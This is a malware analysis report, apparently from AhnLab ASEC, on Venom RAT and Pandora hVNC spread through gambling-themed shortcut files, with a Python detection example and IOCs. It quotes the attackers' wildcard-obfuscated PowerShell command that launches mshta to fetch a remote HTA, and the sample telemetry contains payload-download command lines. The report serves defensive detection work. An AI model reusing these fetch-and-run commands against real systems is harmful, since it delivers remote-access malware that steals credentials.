Distribution of RAT Malware Disguised as a Gambling-related File

AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. As with the VenomRAT distribution method introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and the RAT is downloaded directly by an HTA script.

Figure 1. Operation process

The distributed shortcut file contains a malicious PowerShell command that launches mshta (through a wildcard-obfuscated path rather than the literal file name) to download the malicious script.

  • PowerShell command
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* 'hxxp://193.***.***[.]253:7287/2.hta.hta'

    Figure 2. LNK properties

The malicious URLs in the confirmed shortcut file are as follows:

  • hxxp://193.***.***[.]253:7287/2.hta.hta
  • hxxp://193.***.***[.]253:7287/.hta
  • hxxp://85.209.176[.]158:7287/6.hta

hxxp://193.***.***[.]253:7287/2.hta.hta contains VBS code, as in the earlier case. Embedded in the VBS code are an obfuscated legitimate (decoy) document file and an obfuscated PowerShell command that downloads the RAT. The decoded PowerShell command is shown below.

Figure 3. Decoded PowerShell command

When the command shown in Figure 3 is executed, an Excel file is downloaded from hxxp://193.***.***[.]253:7287/percent.xlsm and saved as percent.xlsm in the %APPDATA% folder. The downloaded Excel file (percent.xlsm) contains the betting methods shown in Figure 4, indicating that the threat actor is targeting users interested in gambling.

Figure 4. Content within percent.xlsm

Afterward, the command downloads an additional executable from hxxp://193.***.***[.]253:7287/darkss.exe and saves it as darkss.exe in the %APPDATA% folder. The downloaded executable is Venom RAT, which not only exfiltrates keystrokes and user credentials but also performs various other malicious activities on commands received from the threat actor.
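As an added illustration (not ASEC's code or any product's detection logic), the following Python example covers both stages described above: the shortcut's PowerShell command reaching mshta through a wildcard path, and the decoded HTA stage dropping percent.xlsm and darkss.exe into %APPDATA%. The event records, process IDs and the 192.0.2.10 address are constructed placeholders modelled on the chain in this post, and the KNOWN_BINARIES list stands in for a real binary inventory.

```python
import re
from dataclasses import dataclass
from fnmatch import fnmatchcase

# Constructed allowlist of script hosts that wildcard path tokens are resolved
# against (assumption: in practice this comes from a binary inventory).
KNOWN_BINARIES = [
    r"C:\Windows\System32\mshta.exe",
    r"C:\Windows\SysWOW64\mshta.exe",
    r"C:\Windows\System32\wscript.exe",
    r"C:\Windows\System32\cmd.exe",
]

# A drive-rooted path token (optionally behind $env:) carrying * or ? wildcards
WILDCARD_PATH = re.compile(r"(?:\$env:)?([A-Za-z]:\\[^\s'\"]*[*?][^\s'\"]*)")
# A remote .hta reference on the command line
HTA_URL = re.compile(r"https?://[^\s'\"]+\.hta\b", re.IGNORECASE)
DROP_EXTENSIONS = (".xlsm", ".exe", ".hta")


def resolve_wildcard_paths(cmdline, known=KNOWN_BINARIES):
    """For each wildcard path token in cmdline, return (token, binaries it globs to)."""
    hits = []
    for match in WILDCARD_PATH.finditer(cmdline):
        token = match.group(1)
        resolved = [p for p in known if fnmatchcase(p.lower(), token.lower())]
        hits.append((token, resolved))
    return hits


@dataclass
class Event:
    kind: str          # "process" = process creation, "file" = file written
    pid: int
    ppid: int
    image: str         # image of the acting process
    cmdline: str = ""  # process events only
    target: str = ""   # file events only


def detect_chain(events):
    """Return [(pid, rule, detail)] for the LNK -> PowerShell -> mshta -> drop chain."""
    parents = {e.pid: e.ppid for e in events if e.kind == "process"}

    def lineage(pid):
        seen = []
        while pid is not None and pid not in seen:
            seen.append(pid)
            pid = parents.get(pid)
        return seen

    findings, suspicious = [], set()
    # Stage 1: a process launching a script host via a wildcard path or a remote HTA
    for e in events:
        if e.kind != "process":
            continue
        reasons = [f"wildcard path {tok} resolves to {', '.join(res)}"
                   for tok, res in resolve_wildcard_paths(e.cmdline) if res]
        reasons += [f"remote HTA {url}" for url in HTA_URL.findall(e.cmdline)]
        if reasons:
            suspicious.add(e.pid)
            findings.append((e.pid, "script-host-launch", "; ".join(reasons)))
    # Stage 2: a descendant of a flagged process writing a payload into %APPDATA%
    for e in events:
        if e.kind != "file":
            continue
        low = e.target.lower()
        if "\\appdata\\roaming\\" in low and low.endswith(DROP_EXTENSIONS) \
                and any(p in suspicious for p in lineage(e.pid)):
            findings.append((e.pid, "appdata-drop", e.target))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed telemetry: explorer runs the LNK, PowerShell globs its way to mshta,
# mshta fetches the HTA, the decoded stage drops two files; pid 500 is benign noise.
SAMPLE_EVENTS = [
    Event("process", 100, 50, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event("process", 200, 100, PS,
          r"powershell.exe . $env:C:\W*\S*2\m*h?a.* 'http://192.0.2.10:7287/2.hta.hta'"),
    Event("process", 300, 200, r"C:\Windows\System32\mshta.exe",
          "mshta.exe http://192.0.2.10:7287/2.hta.hta"),
    Event("process", 400, 300, PS,
          r'powershell.exe -w hidden -c "iwr http://192.0.2.10:7287/percent.xlsm -OutFile $env:APPDATA\percent.xlsm"'),
    Event("file", 400, 300, PS, target=r"C:\Users\user\AppData\Roaming\percent.xlsm"),
    Event("file", 400, 300, PS, target=r"C:\Users\user\AppData\Roaming\darkss.exe"),
    Event("process", 500, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    Event("file", 500, 100, r"C:\Windows\System32\notepad.exe",
          target=r"C:\Users\user\AppData\Roaming\notes.txt"),
]

if __name__ == "__main__":
    for pid, rule, detail in detect_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

The wildcard check is the part worth keeping: matching on the literal string "mshta" misses the `m*h?a.*` token, but globbing each wildcard token against the inventory of script hosts shows what it actually resolves to. The drop rule deliberately requires lineage back to a flagged process, so ordinary applications writing into %APPDATA% (pid 500 above) do not fire.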

Figure 5. Part of darkss.exe (Venom RAT) code

  • C2 : 193.***.***[.]253:4449

On the previously mentioned servers (193.***.***[.]253:7287 and 85.209.176[.]158:7287), various other malicious files were found in addition to those already covered in this post, including HTA scripts, decoy document files, and malicious executables.

Figure 6. List of additional files found in the malicious URL

The additional decoy document files that were found also contained information about gambling websites, as well as personal information of some users.

Figure 7. Additional decoy document file 1 (2023_12.xlsx)

Figure 8. Additional decoy document file 2 (testDB.xlsx)

Darksoft111.exe and Pandora_cryptered.exe shown in Figure 6 are Venom RAT and Pandora hVNC malware, respectively. Users are advised to take extra caution, as the threat actor is using several types of RAT malware.

Figure 9. Part of Pandora_cryptered.exe (Pandora hVNC) code

[File Detection]
Downloader/LNK.Generic.S2541(2024.01.25.02)
Downloader/HTA.Agent (2024.01.29.03)
Trojan/Win.PWSX-gen (2024.01.12.03)
Trojan/Win.Krypt (2024.01.29.03)

[Behavior Detection]
Execution/MDP.Powershell.M2514

[IOC Info]
MD5
ac281f9830ee7f0a142cecc76fe59da9 (LNK)
20a88382040e47209e50652599d92440 (LNK)
cfe22644d656ca2fbdc44aaecb37fab9 (LNK)
15e98eb4a6fd73ff10cac751d467375e (HTA)
97e5b88cf1a452393c790ff84f08e3be (HTA)
9aa64f465c28e4d9af91af2fe2d29e5e (HTA)
04dc064b9e6fbc1466f5844c2dd422a4 (EXE)
a69f529f5fa414aba6af1f063ec7ce32 (EXE)
0bb437212ee1af602f7a34670825ff43 (EXE)
URL
hxxp://85.209.176[.]158:7287
85.209.176[.]158:1337
85.209.176[.]158:4449

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.


Article Link: https://asec.ahnlab.com/en/61335/